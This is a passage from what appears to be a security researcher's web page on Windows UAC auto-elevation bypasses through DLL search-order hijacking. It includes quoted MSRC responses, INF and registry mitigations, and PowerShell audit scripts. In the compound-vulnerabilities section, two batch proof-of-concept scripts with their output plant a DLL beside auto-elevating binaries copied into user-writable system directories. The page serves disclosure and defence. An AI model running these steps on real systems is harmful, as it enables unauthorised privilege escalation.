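Get-UacHijackIndicators | Format-Table -AutoSize -Wrap
```

An empty result means none of the preparations is present in this account right now; it says nothing about the DLL-planting variants (WUSA.exe, the user-writable directories below %SystemRoot%\), which need a file-system check instead. The WindowsApps entry the system itself adds to the user PATH since Windows 8 will show up as a finding on purpose: it is the very directory the MSDT bypass uses.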

Compound Vulnerabilities

For more than 23 (in words: twenty-three) years, Microsoft’s developers as well as their quality miserability assurance have ignored their own company’s security guidance, given for example in the MSDN articles Dynamic-Link Library Security and Dynamic-Link Library Search Order, the Security Advisory 2269637, the MSKB articles 2389418 and 2533623, the MSRC post Load Library Safely, plus many more documents.

Due to this gross incompetence and negligence, almost all applications shipped with Windows are vulnerable to the well-known and well-documented CWE-426: Untrusted Search Path as well as CWE-427: Uncontrolled Search Path Element, and susceptible to the well-known and well-documented CAPEC-471: Search Order Hijacking.

Several directories below %SystemRoot%\, for example %SystemRoot%\System32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\ and %SystemRoot%\System32\Microsoft\Crypto\RSA\MachineKeys\, are writable by unprivileged users. An unprivileged user can copy one of the about 63 (vulnerable) applications which have the auto-elevation (mis)feature enabled into such a directory, place (rogue) DLLs with the names it loads next to it and execute it there: the application auto-elevates, loads the DLLs from its application directory and thus runs arbitrary code with administrative privileges and access rights!
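Which directories below %SystemRoot%\ are writable differs between Windows versions and installed software, so the first thing to establish on a given machine is that list. The following PowerShell function is an added example and not part of the original page: run unelevated, it probes every directory below %SystemRoot%\ by creating a uniquely named empty file with DeleteOnClose, so the probe disappears the moment its handle is closed and nothing is left behind. The function name is this example’s own; it assumes PowerShell 3.0 or later.

```powershell
# Added example (not from the original page): enumerate directories below %SystemRoot% in
# which the current user can create files. Run it from a NON-elevated PowerShell 3.0+
# session; an elevated one would report almost every directory as writable.
# The probe file is created with DeleteOnClose, so nothing is left behind.
function Get-UserWritableSystemDirs {
    param([string]$Root = $env:SystemRoot)

    $probeName = 'probe-' + [guid]::NewGuid().ToString('N') + '.tmp'
    Get-ChildItem -LiteralPath $Root -Directory -Recurse -Force -ErrorAction SilentlyContinue |
        ForEach-Object {
            $probe = Join-Path $_.FullName $probeName
            try {
                # Succeeds only if the ACL grants FILE_ADD_FILE (create files / write data) here.
                [IO.File]::Create($probe, 1, [IO.FileOptions]::DeleteOnClose).Dispose()
                $_.FullName
            } catch [System.UnauthorizedAccessException] {
                # expected for the vast majority of directories
            } catch [System.IO.IOException] {
                # e.g. the directory vanished meanwhile or a reparse point could not be followed
            }
        }
}

Get-UserWritableSystemDirs | Sort-Object
```

Writability is the precondition, not the proof: the batch script below takes each such directory and checks whether an auto-elevating application placed there actually elevates (step 1 shows the prompt from an untrusted directory, step 3 the silent elevation), which is the part that turns a writable directory into a vulnerability.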

Start the Command Processor with delayed (environment variable) expansion enabled under the (protected) administrator account created during Windows Setup and run the following (blocks of) command lines:

REM Copyright © 2011-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

TITLE Step 1: NetPlWiz.exe shows a (yellow) UAC prompt when run from an untrusted directory
COPY /Y "%SystemRoot%\System32\NetPlWiz.exe" "%ProgramData%\NetPlWiz.exe"
START "Oops!" /WAIT /B "%ProgramData%\NetPlWiz.exe"
"%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%

TITLE Step 2: NetPlWiz.exe loads an arbitrary NetPlWiz.dll from its application directory
COPY /Y "%SystemRoot%\System32\ShUnimpl.dll" "%ProgramData%\NetPlWiz.dll"
START "Ouch!" /WAIT /B "%ProgramData%\NetPlWiz.exe"
"%SystemRoot%\System32\CertUtil.exe" /ERROR %ERRORLEVEL%

TITLE Step 3: NetPlWiz.exe auto-elevates and loads an arbitrary NetPlWiz.dll
COPY /Y NUL: "%ProgramData%\NetPlWiz.log"
DIR "%SystemRoot%" /A:D /B /S 1>"%ProgramData%\NetPlWiz.tmp"
FOR /F "Delims= UseBackQ" %? IN ("%ProgramData%\NetPlWiz.tmp") DO @(
MKLINK /H "%~?\NetPlWiz.exe" "%ProgramData%\NetPlWiz.exe" 2>NUL: && (
MKLINK /H "%~?\NetPlWiz.dll" "%ProgramData%\NetPlWiz.dll"
START "BOOM?" /WAIT /B "%~?\NetPlWiz.exe"
ECHO !ERRORLEVEL! %~? 1>>"%ProgramData%\NetPlWiz.log"
ERASE "%~?\NetPlWiz.dll"
ERASE "%~?\NetPlWiz.exe"))

TITLE Step 4: display collected error levels and path names
TYPE "%ProgramData%\NetPlWiz.log"

TITLE Step 5: cleanup
ERASE "%ProgramData%\NetPlWiz.dll"
ERASE "%ProgramData%\NetPlWiz.exe"
ERASE "%ProgramData%\NetPlWiz.log"
ERASE "%ProgramData%\NetPlWiz.tmp"
        1 file(s) copied.
0x0 (WIN32: 0 ERROR_SUCCESS) -- 0 (0)
Error message text: The operation completed successfully.
CertUtil: -error command completed successfully.
        1 file(s) copied.
0xc0000139 (NT: 0xc0000139 STATUS_ENTRYPOINT_NOT_FOUND) -- 3221225785 (-1073741511)
Error message text: {Entry Point Not Found}
The procedure entry point %hs could not be located in the dynamic link library %hs.
CertUtil: -error command completed successfully.
Hardlink created for C:\Windows\Tasks\NetPlWiz.exe <<===>> C:\ProgramData\NetPlWiz.exe
Hardlink created for C:\Windows\Tasks\NetPlWiz.dll <<===>> C:\ProgramData\NetPlWiz.dll
[…]
Hardlink created for C:\Windows\Temp\NetPlWiz.exe <<===>> C:\ProgramData\NetPlWiz.exe
Hardlink created for C:\Windows\Temp\NetPlWiz.dll <<===>> C:\ProgramData\NetPlWiz.dll
Could Not Find C:\Windows\Temp\NetPlWiz.dll
Could Not Find C:\Windows\Temp\NetPlWiz.exe
[…]

REM Copyright © 2011-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

TITLE Step 1: PrintUI.exe shows a (yellow) UAC prompt when run from an untrusted directory
COPY /Y "%SystemRoot%\System32\PrintUI.exe" "%PUBLIC%\PrintUI.exe"
START "Oops!" /WAIT /B "%PUBLIC%\PrintUI.exe"
"%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%

TITLE Step 2: PrintUI.exe loads an arbitrary PrintUI.dll from its application directory
COPY /Y "%SystemRoot%\System32\ShUnimpl.dll" "%PUBLIC%\PrintUI.dll"
START "Ouch!" /WAIT /B "%PUBLIC%\PrintUI.exe"
"%SystemRoot%\System32\Net.exe" HELPMSG %ERRORLEVEL%

TITLE Step 3: PrintUI.exe auto-elevates and loads an arbitrary PrintUI.dll
COPY /Y NUL: "%PUBLIC%\PrintUI.log"
DIR "%SystemRoot%" /A:D /B /S 1>"%PUBLIC%\PrintUI.tmp"
FOR /F "Delims= UseBackQ" %? IN ("%PUBLIC%\PrintUI.tmp") DO @(
MKLINK /H "%~?\PrintUI.exe" "%PUBLIC%\PrintUI.exe" 2>NUL: && (
MKLINK /H "%~?\PrintUI.dll" "%PUBLIC%\PrintUI.dll"
START "BOOM?" /WAIT /B "%~?\PrintUI.exe"
ECHO !ERRORLEVEL! %~? 1>>"%PUBLIC%\PrintUI.log"
ERASE "%~?\PrintUI.dll"
ERASE "%~?\PrintUI.exe"))

TITLE Step 4: display collected error levels and path names
TYPE "%PUBLIC%\PrintUI.log"

TITLE Step 5: cleanup
ERASE "%PUBLIC%\PrintUI.dll"
ERASE "%PUBLIC%\PrintUI.exe"
ERASE "%PUBLIC%\PrintUI.log"
ERASE "%PUBLIC%\PrintUI.tmp"
        1 file(s) copied.
The operation completed successfully.
        1 file(s) copied.
A dynamic link library (DLL) initialization routine failed.
Hardlink created for C:\Windows\Tasks\PrintUI.exe <<===>> C:\Users\Public\PrintUI.exe
Hardlink created for C:\Windows\Tasks\PrintUI.dll <<===>> C:\Users\Public\PrintUI.dll
[…]
Hardlink created for C:\Windows\Temp\PrintUI.exe <<===>> C:\Users\Public\PrintUI.exe
Hardlink created for C:\Windows\Temp\PrintUI.dll <<===>> C:\Users\Public\PrintUI.dll
Could Not Find C:\Windows\Temp\PrintUI.dll
Could Not Find C:\Windows\Temp\PrintUI.exe
[…]

MSRC Case 39303

I reported the vulnerability introduced from the Common Language Runtime of the .NET Framework to the MSRC, where case number 39303 was assigned.

They replied with the following statement:

UAC is not a security boundary. As such, this does not meet the bar for an explicit down level fix.
OUCH: this vulnerability is in the Common Language Runtime of the .NET Framework, not in User Account Control; UAC is merely bypassed as a consequence of it!

Note: User Account Control was, however, announced and introduced as a core security component:

User Account Protection was the preliminary name for a core security component of Windows Vista. The component has now been officially named User Account Control (UAC).
What’s the worth of a core security component that can be bypassed due to careless or clueless implementation of another component?
What about defense in depth or trustworthy computing?

MSRC Case 64957

I reported the vulnerability introduced by the user-writable directories to the MSRC, where case number 64957 was assigned.

They replied with the following statement:

Thank you again for your research and report. Our analyst has completed their review of your report regarding color coded UAC prompts. We were able to reproduce the issue as you reported it, but this issue would not meet our bar for immediate servicing with a Patch Tuesday security update. Issues involving UAC typically do not meet the bar per our servicing criteria published here - https://aka.ms/windowscriteria, as we don't consider UAC a hard security boundary, but rather, a customizable enhancement to assist in making security accessible to all users from home consumers to enterprise customers.

I will be closing this case, but we have notified the UAC team, and this is something that they may consider for a future release of Windows. We appreciate the opportunity to review your research, and please don't hesitate to send us any additional findings at https://aka.ms/secure-at.

Ouch: the vulnerability is not the colour code of the UAC prompt, but that auto-elevation is performed without any UAC prompt for vulnerable applications located in untrusted, user-writable directories!

What’s the worth of a core security component that can be bypassed simply because unprivileged users are granted write permission in directories outside the system directory, thanks to the careless and clueless implementation of the applications that depend on it?
What about defense in depth or trustworthy computing?

Mitigations

With the mitigations presented here an unprivileged process or user can still execute CompMgmtLauncher.exe and EventVwr.exe, but they run with the unprivileged process’ or user’s credentials, not elevated; when they launch %SystemRoot%\System32\CompMgmt.msc or %SystemRoot%\System32\EventVwr.msc, elevation is handled during start of %SystemRoot%\System32\MMC.exe.

Note: the mitigations are designed for and have been tested on Windows 7; their adaption to newer versions of Windows NT is left as an exercise to the reader.

Mitigation against Exploitation of CompMgmtLauncher.exe

Replace the command line of the Computer Management context menu entry of the Computer icon which launches the superfluous CompMgmtLauncher.exe and additionally inhibit its elevation:
; Copyright © 2016-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = AddReg

[AddReg]
HKCR,"CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\Shell\Manage\Command",,32,"%16421%\MMC.exe %16421%\CompMgmt.msc"
HKCR,"Launcher.Computer\Shell\Manage\Command",,32,"%16421%\MMC.exe %16421%\CompMgmt.msc"

HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\CompMgmtLauncher.exe",2,"RunAsInvoker"
Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Note: always specify complete command lines in Registry entries, not just the name of a data or script file, and always use fully qualified pathnames!

Mitigation against Exploitation of EventVwr.exe

Replace the command line of the verb Open for Event Log files which launches the superfluous EventVwr.exe and additionally inhibit its elevation:
; Copyright © 2009-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = AddReg

[AddReg]
HKCR,"evtfile\Shell\Open\Command",,32,"%16421%\MMC.exe %16421%\EventVwr.msc /L:""%L"""
HKCR,"evtxfile\Shell\Open\Command",,32,"%16421%\MMC.exe %16421%\EventVwr.msc /L:""%L"""

HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\EventVwr.exe",2,"RunAsInvoker"
Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Note: always specify complete command lines in Registry entries, not just the name of a data or script file, and always use fully qualified pathnames!

Mitigations against Exploitation of .NET Framework Profiler

Use an unprivileged Standard User account!

Additionally use AppLocker or Software Restriction Policies alias SAFER to deny execution of DLLs from user-writable directories.

Caveat: by default neither of them checks DLLs! For Software Restriction Policies set the Enforcement property to All software files (the default All software files except libraries (such as DLLs) leaves DLLs unchecked); for AppLocker enable and configure the separate DLL rule collection.

Mitigations against Exploitation of HTML Help

Use an unprivileged Standard User account!

Additionally use AppLocker or Software Restriction Policies alias SAFER to deny execution of DLLs from user-writable directories; as noted for the .NET Framework Profiler above, enforcement for DLLs must be enabled explicitly in both.

Mitigations against Exploitation of Vulnerable Shortcuts in the Start Menu

Replace the command line of the shortcuts:
; Copyright © 2009-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
ProfileItems = Shortcut

[Shortcut]
CmdLine     = 16421,,"MMC.exe %16421%\TaskSchd.msc"
;HotKey     =
IconIndex   = 1
IconPath    = 16421,,"MIGUIResource.dll"
InfoTip     = "@%16421%\MIGUIResource.dll,-202"
Name        = "Task Scheduler",0
SubDir      = "Accessories\System Tools"
;WorkingDir = 16421,
Note: creation of safe shortcuts to the various other *.msc found in the directory %ProgramData%\Microsoft\Windows\Start Menu\Programs\Administrative Tools\ is left as an exercise to the reader.

Note: always specify complete command lines in shortcuts, not just the name of a data or script file, and always use fully qualified pathnames!
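
The following PowerShell script is an added audit (not part of the original page or of UACaMole.INF) that lists the shortcuts in the per-machine and per-user Start Menu whose target is a data or script file or is not a fully qualified path, i.e. exactly the shortcuts the note above warns about; with -Fix it rewrites *.msc shortcuts to the complete MMC.exe command line the INF script above installs. It assumes Windows PowerShell 3.0 or newer and the WScript.Shell COM object; the extension list beyond *.msc and the rule that a bare *.msc name refers to %SystemRoot%\System32\ are assumptions of this example, not statements of the page.

```powershell
# Added audit of Start Menu shortcuts (not part of the original page or of UACaMole.INF).
# Assumptions: Windows PowerShell 3.0 or newer; WScript.Shell is registered (it is on stock Windows).
# Usage: .\Audit-Shortcuts.ps1 [-Fix]; -Fix rewrites *.msc shortcuts to the MMC.exe command line
# shown in the INF script above and needs administrative rights for the all-users Start Menu.
param([switch]$Fix)
Set-StrictMode -Version 2

$shell   = New-Object -ComObject WScript.Shell
$mmc     = Join-Path $env:SystemRoot 'System32\MMC.exe'
$folders = @((Join-Path $env:ProgramData 'Microsoft\Windows\Start Menu\Programs'),
             (Join-Path $env:APPDATA     'Microsoft\Windows\Start Menu\Programs'))

foreach ($lnk in Get-ChildItem -Path $folders -Recurse -Filter *.lnk -ErrorAction SilentlyContinue) {
  $sc     = $shell.CreateShortcut($lnk.FullName)
  $target = [string]$sc.TargetPath                    # WScript.Shell returns it with %variables% expanded
  if (-not $target) { continue }                      # shell-folder or CLSID shortcuts have no file target

  # Vulnerable as described above: the target is a data or script file, so the launch goes through
  # the file type's verb, or it is not fully qualified, so it is found via the search path.
  # The extension list is an assumption of this example, not taken from the page.
  $isDataFile = $target -match '\.(msc|hta|js|jse|vbs|vbe|wsf|chm)$'
  $isRelative = -not [IO.Path]::IsPathRooted($target)
  if (-not ($isDataFile -or $isRelative)) { continue }

  '{0}: target "{1}" args "{2}"' -f $lnk.FullName, $target, $sc.Arguments

  if ($Fix -and $target -match '\.msc$') {
    $msc = $target
    if ($isRelative) { $msc = Join-Path $env:SystemRoot "System32\$target" }   # assumption: bare *.msc names live in System32
    $sc.TargetPath = $mmc
    $sc.Arguments  = ('"{0}" {1}' -f $msc, $sc.Arguments).Trim()
    try   { $sc.Save(); '  rewritten: "{0}" {1}' -f $mmc, $sc.Arguments }
    catch { '  not rewritten (no write access?): {0}' -f $_.Exception.Message }
  }
}
```

Run it first without -Fix as the Standard User to see what the shell would launch via a file-type verb; run it with -Fix from an elevated prompt to rewrite the per-machine shortcuts, then re-run without -Fix to confirm that nothing is reported.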

Mitigation against Exploitation of WUSA.exe

Inhibit its elevation:
; Copyright © 2009-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = AddReg

[AddReg]
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\WUSA.exe",2,"RunAsInvoker"
Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Mitigation against Exploitation of MSHTA.exe, CScript.exe and WScript.exe

Inhibit their elevation:
; Copyright © 2009-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = AddReg

[AddReg]
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\MSHTA.exe",2,"RunAsInvoker"
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\CScript.exe",2,"RunAsInvoker"
HKLM,"SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers","%16421%\WScript.exe",2,"RunAsInvoker"
Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!
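
To verify that the RunAsInvoker layers and the replaced verb commands from the preceding INF scripts (CompMgmtLauncher.exe, EventVwr.exe, WUSA.exe, MSHTA.exe, CScript.exe and WScript.exe) are actually in place, the following PowerShell script is an added check, not part of the original page or of UACaMole.INF. It opens the 64-bit and the 32-bit registry view explicitly via RegistryView instead of naming WoW6432Node, as the caveats above demand. It assumes Windows PowerShell 3.0 or newer and, for the 32-bit view on x64 (which the page leaves as an exercise), that the Layers entry names the SysWOW64 copy of the executable.

```powershell
# Added audit script (not part of the original page or of UACaMole.INF).
# Assumptions: Windows PowerShell 3.0 or newer (RegistryView needs .NET 4); for the 32-bit view on
# x64 the Layers entry is assumed to name the SysWOW64 copy of the executable. HKCR is read through
# HKLM\SOFTWARE\Classes, the machine-wide part of HKEY_CLASSES_ROOT.
Set-StrictMode -Version 2

$layersPath  = 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Layers'
$executables = 'CompMgmtLauncher.exe', 'EventVwr.exe', 'WUSA.exe', 'MSHTA.exe', 'CScript.exe', 'WScript.exe'
# Verb commands replaced by the INF scripts above, and the launcher they must no longer reference.
$verbs = @{
  'CLSID\{20D04FE0-3AEA-1069-A2D8-08002B30309D}\Shell\Manage\Command' = 'CompMgmtLauncher.exe'
  'Launcher.Computer\Shell\Manage\Command'                            = 'CompMgmtLauncher.exe'
  'evtfile\Shell\Open\Command'                                        = 'EventVwr.exe'
  'evtxfile\Shell\Open\Command'                                       = 'EventVwr.exe'
}

$is64 = [Environment]::Is64BitOperatingSystem
# Open each registry view explicitly instead of spelling out WoW6432Node (see the caveats above).
$views = @([Microsoft.Win32.RegistryView]::Registry64)
if ($is64) { $views += [Microsoft.Win32.RegistryView]::Registry32 }

foreach ($view in $views) {
  $hklm = [Microsoft.Win32.RegistryKey]::OpenBaseKey([Microsoft.Win32.RegistryHive]::LocalMachine, $view)
  # The "System32" of the 32-bit view on x64 is SysWOW64, so the layer entry must name that path.
  $system32 = Join-Path $env:SystemRoot $(if ($is64 -and $view -eq [Microsoft.Win32.RegistryView]::Registry32) { 'SysWOW64' } else { 'System32' })

  $layers = $hklm.OpenSubKey($layersPath)
  foreach ($exe in $executables) {
    $path  = Join-Path $system32 $exe
    $value = if ($layers) { $layers.GetValue($path) } else { $null }
    $ok    = ($value -ne $null) -and (($value -split '\s+') -contains 'RunAsInvoker')
    '{0,-10} {1,-7} Layers {2}' -f $view, $(if ($ok) { 'OK' } else { 'MISSING' }), $path
  }

  foreach ($verb in $verbs.Keys) {
    $key = $hklm.OpenSubKey("SOFTWARE\Classes\$verb")
    $cmd = if ($key) { [string]$key.GetValue('') } else { '' }
    $state = 'OK'
    if (-not $cmd) { $state = 'ABSENT' }
    elseif ($cmd -match [regex]::Escape($verbs[$verb])) { $state = 'BAD' }
    '{0,-10} {1,-7} Verb   {2} = {3}' -f $view, $state, $verb, $cmd
  }
  $hklm.Close()
}
```

Every line must read OK after installation; a MISSING layer means the executable still auto-elevates from the listed path, a BAD verb means the shell still launches the superfluous launcher.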

Mitigations against Exploitation of Compound Vulnerabilities

Use an unprivileged Standard User account!

Set the UAC slider to its highest position titled Always notify:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System]
"ConsentPromptBehaviorAdmin"=dword:00000002
;"ConsentPromptBehaviorUser"=dword:00000000
Additionally deny execution (for unprivileged users) in all user-writable subdirectories below %SystemRoot%\, for example via AppLocker or Software Restriction Policies alias SAFER.

Finally remove the permission for unprivileged users (really: members of the NT AUTHORITY\Authenticated Users or BUILTIN\Users groups) to create subdirectories in the root directory of the system drive:

ICACLs.exe %SystemDrive%\ /Deny *S-1-5-32-545:(AD,WD) /Remove:d *S-1-5-32-545 /Remove:g *S-1-5-11

Disable the Diagnostics Troubleshooting Wizard:

REGEDIT4

[HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics]
"EnableDiagnostics"=dword:00000000
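
The following PowerShell script is an added check (not part of the original page or of UACaMole.INF) for the compound mitigations above: it verifies the two policy values, probes whether the current user can still create a subdirectory in the root of the system drive (the ICACLS step), and then lists every directory below %SystemRoot% in which the current user can create files, i.e. the directories which the Proof of Concept above discovers by trial with MKLINK and which the AppLocker or SAFER rules must cover. It assumes Windows PowerShell 3.0 or newer; the probe file name prefix uacamole-probe- is arbitrary.

```powershell
# Added check for the compound mitigations above (not part of the original page or of UACaMole.INF).
# Run it as the unprivileged Standard User whose view matters: run elevated, every directory is writable.
# Assumption: Windows PowerShell 3.0 or newer (Get-ChildItem -Directory).
Set-StrictMode -Version 2

$principal = New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())
if ($principal.IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) {
  Write-Warning 'Running with administrative rights; the write probes below are meaningless.'
}

# 1. Policy values set by the two REGEDIT4 fragments above.
$checks = @(
  @{ Key = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System'; Name = 'ConsentPromptBehaviorAdmin'; Want = 2 },
  @{ Key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\ScriptedDiagnostics';   Name = 'EnableDiagnostics';          Want = 0 }
)
foreach ($c in $checks) {
  $item = Get-ItemProperty -Path $c.Key -Name $c.Name -ErrorAction SilentlyContinue
  $have = if ($item) { $item.($c.Name) } else { '<absent>' }
  '{0,-7} {1} = {2} (want {3})' -f $(if ("$have" -eq "$($c.Want)") { 'OK' } else { 'BAD' }), $c.Name, $have, $c.Want
}

# 2. Write probes: can this user create a file (or, in the root directory, a subdirectory) here?
#    A user who may create files in a directory may also create hardlinks there, as the PoC does.
function Test-CanCreate([string]$Directory, [string]$ItemType) {
  $probe = Join-Path $Directory ('uacamole-probe-' + [Guid]::NewGuid().ToString('N'))
  try {
    $null = New-Item -Path $probe -ItemType $ItemType -ErrorAction Stop
    Remove-Item -LiteralPath $probe -Force -ErrorAction SilentlyContinue
    return $true
  } catch { return $false }
}

$root = $env:SystemDrive + '\'
'{0,-7} {1} (subdirectory creation; ICACLS step above)' -f $(if (Test-CanCreate $root 'Directory') { 'BAD' } else { 'OK' }), $root

# Every directory listed here needs an execution-deny rule (AppLocker or SAFER) or tighter permissions.
$writable = @(Get-ChildItem -Path $env:SystemRoot -Recurse -Directory -ErrorAction SilentlyContinue |
              Where-Object { Test-CanCreate $_.FullName 'File' } |
              ForEach-Object { $_.FullName })
'{0} user-writable director{1} below {2}:' -f $writable.Count, $(if ($writable.Count -eq 1) { 'y' } else { 'ies' }), $env:SystemRoot
$writable
```

The recursive walk over %SystemRoot% takes a while and creates and deletes one empty probe file per writable directory; compare its output with the path names the Proof of Concept above records in PrintUI.log, they must match.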

Alternative Mitigation

Launch another, arbitrary application instead of the superfluous CompMgmtLauncher.exe:
; Copyright © 2016-2024, Stefan Kanthak <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>

[Version]
Provider  = "Stefan Kanthak"
Signature = "$Windows NT$"

[DefaultInstall]
AddReg    = AddReg

[AddReg]
HKLM,"SOFTWARE\Microsoft\Windows NT\Image File Execution Options\CompMgmtLauncher.exe","Debugger",0,"%16420%\.exe"
Download the Vulnerability and Exploit Detector SENTINEL.EXE and save it as %SystemRoot%\.exe.

Note: addition of the Registry entries for the AMD64 alias x64 and IA64 processor architectures as well as EventVwr.exe is left as an exercise to the reader.

Caveat: NEVER use the implementation-defined reserved Registry (sub)keys WoW6432Node and WoWAA32Node; specify the proper flags or run the installation in the proper execution environment!

Installation

Download the setup script UACAMOLE.INF, then right-click to display its context menu and click Install to run the installation.
Installation requires administrative privileges and access rights.

Note: on Windows Vista and newer versions of Windows NT, InfDefaultInstall.exe, the application registered for the Install verb of *.inf files, requests administrative privileges.

Note: on systems with AMD64 alias x64 processor architecture, the installation must be run in the native (64-bit) execution environment!

Update

The setup script supports the update from any previous version: just install the current version!

Deinstallation

Not provided.

Trivia

UACaMole is pronounced like Whack-a-Mole.

Contact and Feedback

If you miss anything here, have additions, comments, corrections, criticism or questions, want to give feedback, hints or tips, report broken links, bugs, deficiencies, errors, inaccuracies, misrepresentations, omissions, shortcomings, vulnerabilities or weaknesses, …: don’t hesitate to contact me and feel free to ask, comment, criticise, flame, notify or report!

Use the X.509 certificate to send S/MIME encrypted mail.

Note: email in weird format and without a proper sender name is likely to be discarded!

I dislike HTML (and even weirder formats too) in email, I prefer to receive plain text.
I also expect to see your full (real) name as sender, not your nickname.
I abhor top posts and expect inline quotes in replies.

Terms and Conditions

By using this site, you signify your agreement to these terms and conditions. If you do not agree to these terms and conditions, do not use this site!

Data Protection Declaration

This web page records no (personal) data and stores no cookies in the web browser.

The web service is operated and provided by

Telekom Deutschland GmbH
Business Center
D-64306 Darmstadt
Germany
<‍hosting‍@‍telekom‍.‍de‍>
+49 800 5252033

The web service provider stores a session cookie in the web browser and records every visit of this web site with the following data in an access log on their server(s):


Copyright © 1995–2024 • Stefan Kanthak • <‍stefan‍.‍kanthak‍@‍nexgo‍.‍de‍>